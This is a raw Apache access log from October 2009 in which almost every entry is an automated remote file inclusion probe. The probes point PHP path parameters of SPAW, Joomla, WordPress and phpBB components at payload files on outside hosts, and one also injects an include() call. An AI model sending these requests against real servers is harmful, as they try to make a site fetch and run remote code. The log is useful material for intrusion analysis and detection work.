83.138.48.14 - - [06/Oct/2009:02:19:22 -0400] "GET /logs/access_log.Q109051400//main.php?appserv_root=http://pseuc0de.fileave.com/zfxid1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
200.219.245.149 - - [06/Oct/2009:02:19:25 -0400] "GET /logs/access_log.Q109083100/admin/editeur/spaw_control.class.php?spaw_root=http://www.gizzang.co.kr/bbs//data/rfi.txt%0D?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
67.218.116.164 - - [06/Oct/2009:02:19:28 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
200.219.245.149 - - [06/Oct/2009:02:19:36 -0400] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://www.gizzang.co.kr/bbs//data/rfi.txt%0D?? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
200.219.245.149 - - [06/Oct/2009:02:19:36 -0400] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://www.gizzang.co.kr/bbs//data/rfi.txt%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
200.219.245.149 - - [06/Oct/2009:02:19:36 -0400] "GET /logs/access_log.Q109063000/admin/editeur/spaw_control.class.php?spaw_root=http://www.gizzang.co.kr/bbs//data/rfi.txt%0D?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
200.219.245.149 - - [06/Oct/2009:02:19:48 -0400] "GET /logs/access_log.Q109083100/admin/editeur/spaw_control.class.php?spaw_root=http://www.gizzang.co.kr/bbs//data/rfi.txt%0D?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
211.40.68.132 - - [06/Oct/2009:02:19:53 -0400] "GET //appserv/mani.php?appserv_root=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
211.40.68.132 - - [06/Oct/2009:02:19:53 -0400] "GET /logs//appserv/mani.php?appserv_root=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
211.40.68.132 - - [06/Oct/2009:02:19:53 -0400] "GET /logs/access_log.Q109051400//appserv/mani.php?appserv_root=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
218.55.227.178 - - [06/Oct/2009:02:20:00 -0400] "GET /logs/access_log.Q109092400%20//common/db.php?commonpath=http://www.gizzang.co.kr/bbs//data/rfi.txt?%0D?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
61.129.64.174 - - [06/Oct/2009:02:20:43 -0400] "GET /logs/access_log.Q109090500/?_SERVER[DOCUMENT_ROOT]=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
67.218.116.132 - - [06/Oct/2009:02:21:13 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
209.59.12.99 - - [06/Oct/2009:02:21:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
61.135.134.78 - - [06/Oct/2009:02:21:24 -0400] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://www.marcalanfreedman.com///old_blog/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
61.135.134.78 - - [06/Oct/2009:02:21:24 -0400] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://www.marcalanfreedman.com///old_blog/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
61.135.134.78 - - [06/Oct/2009:02:21:24 -0400] "GET /logs/access_log.Q109063000/admin/editeur/spaw_control.class.php?spaw_root=http://www.marcalanfreedman.com///old_blog/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
61.135.134.78 - - [06/Oct/2009:02:21:24 -0400] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://www.marcalanfreedman.com///old_blog/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
61.135.134.78 - - [06/Oct/2009:02:21:24 -0400] "GET /logs/access_log.Q109063000/admin/editeur/spaw_control.class.php?spaw_root=http://www.marcalanfreedman.com///old_blog/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
61.135.134.78 - - [06/Oct/2009:02:21:24 -0400] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://www.marcalanfreedman.com///old_blog/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
61.135.134.215 - - [06/Oct/2009:02:21:24 -0400] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://www.marcalanfreedman.com///old_blog/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
61.135.134.215 - - [06/Oct/2009:02:21:24 -0400] "GET /logs/access_log.Q109063000/admin/editeur/spaw_control.class.php?spaw_root=http://www.marcalanfreedman.com///old_blog/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
61.135.134.215 - - [06/Oct/2009:02:21:24 -0400] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://www.marcalanfreedman.com///old_blog/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
61.135.134.215 - - [06/Oct/2009:02:21:24 -0400] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://www.marcalanfreedman.com///old_blog/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
61.135.134.215 - - [06/Oct/2009:02:21:26 -0400] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://www.marcalanfreedman.com///old_blog/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
61.135.134.215 - - [06/Oct/2009:02:21:26 -0400] "GET /logs/access_log.Q109063000/admin/editeur/spaw_control.class.php?spaw_root=http://www.marcalanfreedman.com///old_blog/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
61.135.134.215 - - [06/Oct/2009:02:21:30 -0400] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://www.marcalanfreedman.com///old_blog/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
61.135.134.215 - - [06/Oct/2009:02:21:30 -0400] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://www.marcalanfreedman.com///old_blog/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
61.135.134.215 - - [06/Oct/2009:02:21:30 -0400] "GET /logs/access_log.Q109063000/admin/editeur/spaw_control.class.php?spaw_root=http://www.marcalanfreedman.com///old_blog/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
211.40.68.132 - - [06/Oct/2009:02:21:31 -0400] "GET /logs/access_log.Q109080600//appserv/mani.php?appserv_root=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
61.135.134.215 - - [06/Oct/2009:02:21:31 -0400] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://www.marcalanfreedman.com///old_blog/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
61.135.134.215 - - [06/Oct/2009:02:21:31 -0400] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://www.marcalanfreedman.com///old_blog/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
61.135.134.215 - - [06/Oct/2009:02:21:31 -0400] "GET /logs/access_log.Q109063000/admin/editeur/spaw_control.class.php?spaw_root=http://www.marcalanfreedman.com///old_blog/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
61.135.134.78 - - [06/Oct/2009:02:22:00 -0400] "GET /logs/access_log.Q109083100/admin/editeur/spaw_control.class.php?spaw_root=http://www.marcalanfreedman.com///old_blog/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
61.135.134.78 - - [06/Oct/2009:02:22:01 -0400] "GET /logs/access_log.Q109083100/admin/editeur/spaw_control.class.php?spaw_root=http://www.marcalanfreedman.com///old_blog/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
61.135.134.215 - - [06/Oct/2009:02:22:01 -0400] "GET /logs/access_log.Q109083100/admin/editeur/spaw_control.class.php?spaw_root=http://www.marcalanfreedman.com///old_blog/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
61.135.134.215 - - [06/Oct/2009:02:22:01 -0400] "GET /logs/access_log.Q109083100/admin/editeur/spaw_control.class.php?spaw_root=http://www.marcalanfreedman.com///old_blog/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
61.135.134.215 - - [06/Oct/2009:02:22:02 -0400] "GET /logs/access_log.Q109083100/admin/editeur/spaw_control.class.php?spaw_root=http://www.marcalanfreedman.com///old_blog/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
61.135.134.215 - - [06/Oct/2009:02:22:05 -0400] "GET /logs/access_log.Q109083100/admin/editeur/spaw_control.class.php?spaw_root=http://www.marcalanfreedman.com///old_blog/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
58.184.252.3 - - [06/Oct/2009:02:22:15 -0400] "GET //?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
58.184.252.3 - - [06/Oct/2009:02:22:15 -0400] "GET /logs/access_log.Q109070800%20%20//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
58.184.252.3 - - [06/Oct/2009:02:22:20 -0400] "GET /logs/access_log.Q109080400%20%20//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
58.184.252.3 - - [06/Oct/2009:02:22:22 -0400] "GET /logs//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 20719 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:02:23:17 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:02:23:17 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:02:23:17 -0400] "GET /logs/access_log.Q109063000%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
200.219.245.149 - - [06/Oct/2009:02:23:17 -0400] "GET /logs/access_log.Q109063000%20/admin/editeur/spaw_control.class.php?spaw_root=http://www.gizzang.co.kr/bbs//data/rfi.txt%0D?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
75.126.132.20 - - [06/Oct/2009:02:23:25 -0400] "GET /logs/access_log.Q109052000%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:02:23:32 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:02:23:32 -0400] "GET /logs/access_log.Q109063000%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:02:23:32 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
200.219.245.149 - - [06/Oct/2009:02:23:35 -0400] "GET /logs/access_log.Q109063000%20/admin/editeur/spaw_control.class.php?spaw_root=http://www.gizzang.co.kr/bbs//data/rfi.txt%0D?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
75.126.132.20 - - [06/Oct/2009:02:23:35 -0400] "GET /logs/access_log.Q109063000%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:02:23:35 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:02:23:35 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:02:23:40 -0400] "GET /logs/access_log.Q109052000%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:02:23:41 -0400] "GET /logs/access_log.Q109052000%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
174.143.3.188 - - [06/Oct/2009:02:24:42 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
174.143.3.188 - - [06/Oct/2009:02:24:42 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
174.143.3.188 - - [06/Oct/2009:02:24:42 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
174.143.3.188 - - [06/Oct/2009:02:24:42 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
58.184.252.3 - - [06/Oct/2009:02:24:55 -0400] "GET /logs/access_log.Q109080800%20%20//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
122.199.140.158 - - [06/Oct/2009:02:25:02 -0400] "GET //components/com_virtuemart/export.php?mosConfig_absolute_path=http://titid.fileave.com/readme.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.199.140.158 - - [06/Oct/2009:02:25:02 -0400] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://titid.fileave.com/readme.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
122.199.140.158 - - [06/Oct/2009:02:25:02 -0400] "GET /logs/access_log.Q109082800%20%20//components/com_virtuemart/export.php?mosConfig_absolute_path=http://titid.fileave.com/readme.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
122.199.140.158 - - [06/Oct/2009:02:25:26 -0400] "GET /logs/access_log.Q109051300%20%20//components/com_virtuemart/export.php?mosConfig_absolute_path=http://titid.fileave.com/readme.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
218.55.227.178 - - [06/Oct/2009:02:26:37 -0400] "GET /logs/access_log.Q109071900%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.gizzang.co.kr/bbs//data/rfi.txt?%0D?? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
218.55.227.178 - - [06/Oct/2009:02:26:37 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.gizzang.co.kr/bbs//data/rfi.txt?%0D?? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
218.55.227.178 - - [06/Oct/2009:02:26:37 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.gizzang.co.kr/bbs//data/rfi.txt?%0D?? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
91.121.75.81 - - [06/Oct/2009:02:27:15 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:02:27:15 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:02:27:19 -0400] "GET /logs/access_log.Q109051500//modules/xfsection/modify.php?dir_module=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Oct/2009:02:27:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.6.232.171 - - [06/Oct/2009:02:27:31 -0400] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.chjeil.or.kr/home/root/tukulid.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
64.6.232.171 - - [06/Oct/2009:02:27:31 -0400] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.chjeil.or.kr/home/root/tukulid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
64.6.232.171 - - [06/Oct/2009:02:27:31 -0400] "GET /logs/access_log.Q109062800//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.chjeil.or.kr/home/root/tukulid.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
218.55.227.178 - - [06/Oct/2009:02:27:50 -0400] "GET //?cmd&file[DOCUMENT_ROOT]=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
218.55.227.178 - - [06/Oct/2009:02:27:50 -0400] "GET /logs/access_log.Q109072900%20%20//?cmd&file[DOCUMENT_ROOT]=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
218.55.227.178 - - [06/Oct/2009:02:27:50 -0400] "GET /logs//?cmd&file[DOCUMENT_ROOT]=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 200 20719 "-" "Mozilla/5.0"
64.6.232.171 - - [06/Oct/2009:02:27:51 -0400] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.chjeil.or.kr/home/root/tukulid.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
64.6.232.171 - - [06/Oct/2009:02:27:51 -0400] "GET /logs/access_log.Q109062800//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.chjeil.or.kr/home/root/tukulid.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
64.6.232.171 - - [06/Oct/2009:02:27:51 -0400] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.chjeil.or.kr/home/root/tukulid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
64.6.232.171 - - [06/Oct/2009:02:28:04 -0400] "GET /logs/access_log.Q109072000//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.chjeil.or.kr/home/root/tukulid.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
218.55.227.178 - - [06/Oct/2009:02:28:10 -0400] "GET //?cmd&file[DOCUMENT_ROOT]=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
218.55.227.178 - - [06/Oct/2009:02:28:10 -0400] "GET /logs/access_log.Q109072900%20%20//?cmd&file[DOCUMENT_ROOT]=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
218.55.227.178 - - [06/Oct/2009:02:28:10 -0400] "GET /logs//?cmd&file[DOCUMENT_ROOT]=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 200 20719 "-" "Mozilla/5.0"
64.6.232.171 - - [06/Oct/2009:02:28:36 -0400] "GET /logs/access_log.Q109072000//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.chjeil.or.kr/home/root/tukulid.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
58.184.252.3 - - [06/Oct/2009:02:28:36 -0400] "GET /logs/access_log.Q109070800//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
58.184.252.3 - - [06/Oct/2009:02:28:36 -0400] "GET /logs/access_log.Q109080400//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
200.219.245.149 - - [06/Oct/2009:02:28:54 -0400] "GET /logs/access_log.Q109062900%20%20//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.gizzang.co.kr/bbs//data/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.219.245.149 - - [06/Oct/2009:02:28:54 -0400] "GET //index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.gizzang.co.kr/bbs//data/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.219.245.149 - - [06/Oct/2009:02:28:54 -0400] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.gizzang.co.kr/bbs//data/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.219.245.149 - - [06/Oct/2009:02:28:58 -0400] "GET /logs/access_log.Q109062900%20%20//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.gizzang.co.kr/bbs//data/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.219.245.149 - - [06/Oct/2009:02:28:58 -0400] "GET //index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.gizzang.co.kr/bbs//data/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.219.245.149 - - [06/Oct/2009:02:28:59 -0400] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.gizzang.co.kr/bbs//data/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
67.225.145.23 - - [06/Oct/2009:02:29:15 -0400] "GET /logs/error_log.Q109082100/index.php?go=http://www.nanuquevirtual.com/idr?? HTTP/1.1" 404 233 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
67.225.145.23 - - [06/Oct/2009:02:29:15 -0400] "GET /logs/index.php?go=http://www.nanuquevirtual.com/idr?? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
67.225.145.23 - - [06/Oct/2009:02:29:15 -0400] "GET /index.php?go=http://www.nanuquevirtual.com/idr?? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
61.135.134.78 - - [06/Oct/2009:02:29:28 -0400] "GET /logs/access_log.Q109063000%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://www.marcalanfreedman.com///old_blog/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
61.135.134.78 - - [06/Oct/2009:02:29:29 -0400] "GET /logs/access_log.Q109063000%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://www.marcalanfreedman.com///old_blog/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
61.135.134.78 - - [06/Oct/2009:02:29:39 -0400] "GET /logs/access_log.Q109083100%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://www.marcalanfreedman.com///old_blog/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
61.135.134.78 - - [06/Oct/2009:02:29:39 -0400] "GET /logs/access_log.Q109083100%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://www.marcalanfreedman.com///old_blog/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
69.62.196.11 - - [06/Oct/2009:02:30:38 -0400] "GET /logs/index1.php?site=http://www.sportmedia.hu/diaksport/nucleus/nucleus/images/feel/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
69.62.196.11 - - [06/Oct/2009:02:30:38 -0400] "GET /logs/access_log.Q109052300/index1.php?site=http://www.sportmedia.hu/diaksport/nucleus/nucleus/images/feel/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.62.196.11 - - [06/Oct/2009:02:30:38 -0400] "GET /index1.php?site=http://www.sportmedia.hu/diaksport/nucleus/nucleus/images/feel/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.62.196.11 - - [06/Oct/2009:02:30:41 -0400] "GET /logs/access_log.Q109063000/index1.php?site=http://www.sportmedia.hu/diaksport/nucleus/nucleus/images/feel/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.135.134.215 - - [06/Oct/2009:02:31:13 -0400] "GET /logs/access_log.Q109063000%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://www.marcalanfreedman.com///old_blog/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
61.135.134.215 - - [06/Oct/2009:02:31:18 -0400] "GET /logs/access_log.Q109063000%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://www.marcalanfreedman.com///old_blog/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
61.135.134.215 - - [06/Oct/2009:02:31:29 -0400] "GET /logs/access_log.Q109083100%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://www.marcalanfreedman.com///old_blog/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
61.135.134.215 - - [06/Oct/2009:02:31:34 -0400] "GET /logs/access_log.Q109083100%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://www.marcalanfreedman.com///old_blog/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
61.135.134.215 - - [06/Oct/2009:02:31:54 -0400] "GET /logs/access_log.Q109063000%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://www.marcalanfreedman.com///old_blog/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:31:59 -0400] "GET /logs/access_log.Q109052600/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:31:59 -0400] "GET /logs/access_log.Q109091100/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
